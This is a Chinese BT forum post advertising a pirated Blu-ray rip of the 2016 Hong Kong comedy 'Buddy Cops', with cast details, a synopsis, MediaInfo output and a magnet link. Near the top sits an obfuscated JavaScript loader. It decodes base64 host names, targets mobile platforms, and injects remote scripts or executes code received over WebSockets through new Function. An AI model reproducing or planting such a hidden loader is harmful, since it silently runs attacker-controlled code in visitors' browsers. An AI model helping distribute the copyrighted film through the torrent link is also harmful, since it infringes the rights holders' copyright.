刑警兄弟[国语配音/粤语配音/中文字幕].Buddy.Cops.2016.1080p.BluRay.x265.10bit.DTS.2Audio 7.28GB

版主小s 1月前 180

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 刑警兄弟 / 神兽刑警 / Buddy Cops
◎片  名 神獸巴打
◎年  代 2016
◎产  地 中国香港 / 中国大陆
◎类  别 喜剧 / 动作
◎语  言 粤语 / 汉语普通话
◎上映日期 2016-04-22(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt5617254/
◎豆瓣评分 5.3/10 (7165人评价)
◎豆瓣链接 https://movie.douban.com/subject/11625312/
◎片  长 97分钟(中国大陆)
◎导  演 戚家基 Peter Tsi (id:1328458)
       曾志伟 Eric Tsang (id:1002862)
◎编  剧 戚家基 Peter Tsi (id:1328458)
       郭建乐 Kin-Lok Kwok (id:1328460)
◎演  员 黄宗泽 Bosco Wong (id:1038569)
       金刚 Kong King (id:1317182)
       曾志伟 Eric Tsang (id:1002862)
       徐子珊 Kate Tsui (id:1018555)
       方皓玟 Charmaine Fong (id:1319116)
       陈小春 Jordan Chan (id:1075760)
       林家栋 Ka Tung Lam (id:1050329)
       冯淬帆 Stanley Fung (id:1274503)
       金燕玲 Elaine Jin (id:1280673)
       余安安 On-on Yu (id:1301560)
       谢天华 Michael Tse (id:1010833)
       陈炜 Alice Chan (id:1042796)
       高钧贤 Matthew Kwan Yin Ko (id:1314484)
       姚文基 Man-kei Yiu (id:1435360)
       罗莽 Meng Lo (id:1025509)
       罗利期 Joe Junior (id:1319195)
       吴业坤 Ng Yip Kwan (id:1327655)
       王俊棠 Ricky Wong Chun-Tong (id:1321444)
       陈国峰 Penny Chan (id:1387355)
       李伟健 Kim Li (id:1386668)
       萧家浩 Edmond Siu (id:1431960)
       黄凤琼 Fung-King Wong (id:1327386)
       汤盈盈 Angela Tong (id:1150279)
       康华 Akina Hong (id:1312853)
       郑丽莎 Lisa Cheng (id:1359537)
       林伟 Vincent Lam (id:1313802)
       乐易玲 Virginia Lok (id:1403148)
       邵剑秋 Kim-Chau Shiu (id:1413263)
       王祖蓝 Cho-lam Wong (id:1274238)
       黄伟辉 Wong Wai-Fai (id:1275163)
       朱希敏 Hyman Chu (id:1359538)
       张秀文 Sammi Cheung (id:1323262)
       谢静婷 Iris Tse (id:1359540)

◎标  签 香港 / 喜剧 / 搞笑 / 2016 / 动作 / 警察 / 警匪 / 中国

◎简  介
  陈飞和尊尼都是来自单亲家庭的年青警员,处事也都不成熟,加上性格迥然不同,相处中产生许多矛盾。偏偏陈飞的父亲和尊尼的母亲相恋,使两人关系更形紧张,闹出许多笑话。后来,两人通过侦查罪案增进了解、冰释前嫌。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 36938724230189988353747448268309377266 (0x1BCA23B6F167EB934E615B27B7F3B0F2)

  4. Complete name                            : [email protected]COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.28 GiB

  8. Duration                                 : 1 h 41 min

  9. Overall bit rate                         : 10.3 Mb/s

  10. Movie name                               : Buddy Cops 2016

  11. Encoded date                             : UTC 2021-08-01 03:14:45

  12. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 41 min

  23. Bit rate                                 : 7 170 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 804 pixels

  26. Display aspect ratio                     : 2.40:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 24.000 FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.194

  33. Stream size                              : 5.09 GiB (70%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=18.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No


  38. Audio #1

  39. ID                                       : 2

  40. ID in the original source medium         : 4352 (0x1100)

  41. Format                                   : DTS

  42. Format/Info                              : Digital Theater Systems

  43. Codec ID                                 : A_DTS

  44. Duration                                 : 1 h 41 min

  45. Bit rate mode                            : Constant

  46. Bit rate                                 : 1 509 kb/s

  47. Channel(s)                               : 6 channels

  48. Channel layout                           : C L R Ls Rs LFE

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 93.750 FPS (512 SPF)

  51. Bit depth                                : 16 bits

  52. Compression mode                         : Lossy

  53. Stream size                              : 1.07 GiB (15%)

  54. Title                                    : Cantonese

  55. Language                                 : Chinese

  56. Default                                  : Yes

  57. Forced                                   : No

  58. Original source medium                   : Blu-ray


  59. Audio #2

  60. ID                                       : 3

  61. ID in the original source medium         : 4353 (0x1101)

  62. Format                                   : DTS

  63. Format/Info                              : Digital Theater Systems

  64. Codec ID                                 : A_DTS

  65. Duration                                 : 1 h 41 min

  66. Bit rate mode                            : Constant

  67. Bit rate                                 : 1 509 kb/s

  68. Channel(s)                               : 2 channels

  69. Channel layout                           : L R

  70. Sampling rate                            : 48.0 kHz

  71. Frame rate                               : 93.750 FPS (512 SPF)

  72. Bit depth                                : 16 bits

  73. Compression mode                         : Lossy

  74. Stream size                              : 1.07 GiB (15%)

  75. Title                                    : Mandarin

  76. Language                                 : Chinese

  77. Default                                  : No

  78. Forced                                   : No

  79. Original source medium                   : Blu-ray


  80. Text #1

  81. ID                                       : 4

  82. ID in the original source medium         : 4609 (0x1201)

  83. Format                                   : PGS

  84. Muxing mode                              : zlib

  85. Codec ID                                 : S_HDMV/PGS

  86. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  87. Duration                                 : 1 h 36 min

  88. Bit rate                                 : 41.3 kb/s

  89. Count of elements                        : 3170

  90. Stream size                              : 28.5 MiB (0%)

  91. Title                                    : chs

  92. Language                                 : Chinese

  93. Default                                  : No

  94. Forced                                   : No

  95. Original source medium                   : Blu-ray


  96. Text #2

  97. ID                                       : 5

  98. ID in the original source medium         : 4608 (0x1200)

  99. Format                                   : PGS

  100. Muxing mode                              : zlib

  101. Codec ID                                 : S_HDMV/PGS

  102. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration                                 : 1 h 36 min

  104. Bit rate                                 : 42.0 kb/s

  105. Count of elements                        : 3170

  106. Stream size                              : 29.0 MiB (0%)

  107. Title                                    : cht

  108. Language                                 : Chinese

  109. Default                                  : No

  110. Forced                                   : No

  111. Original source medium                   : Blu-ray


  112. Text #3

  113. ID                                       : 6

  114. ID in the original source medium         : 4610 (0x1202)

  115. Format                                   : PGS

  116. Muxing mode                              : zlib

  117. Codec ID                                 : S_HDMV/PGS

  118. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration                                 : 1 h 36 min

  120. Bit rate                                 : 44.9 kb/s

  121. Count of elements                        : 3171

  122. Stream size                              : 31.0 MiB (0%)

  123. Language                                 : English

  124. Default                                  : No

  125. Forced                                   : No

  126. Original source medium                   : Blu-ray


  127. Menu

  128. 00:00:00.000                             : Chapter 01

  129. 00:10:48.333                             : Chapter 02

  130. 00:19:41.000                             : Chapter 03

  131. 00:24:24.916                             : Chapter 04

  132. 00:36:23.208                             : Chapter 05

  133. 00:45:17.750                             : Chapter 06

  134. 00:49:31.541                             : Chapter 07

  135. 00:59:07.375                             : Chapter 08

  136. 01:09:40.666                             : Chapter 09

  137. 01:17:55.875                             : Chapter 10

  138. 01:24:12.541                             : Chapter 11

  139. 01:31:21.166                             : Chapter 12



TAGS 动作 喜剧

磁力链:
  • magnet:?xt=urn:btih:56E194AEE38A2A04391D7075F795568113AD11C2
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回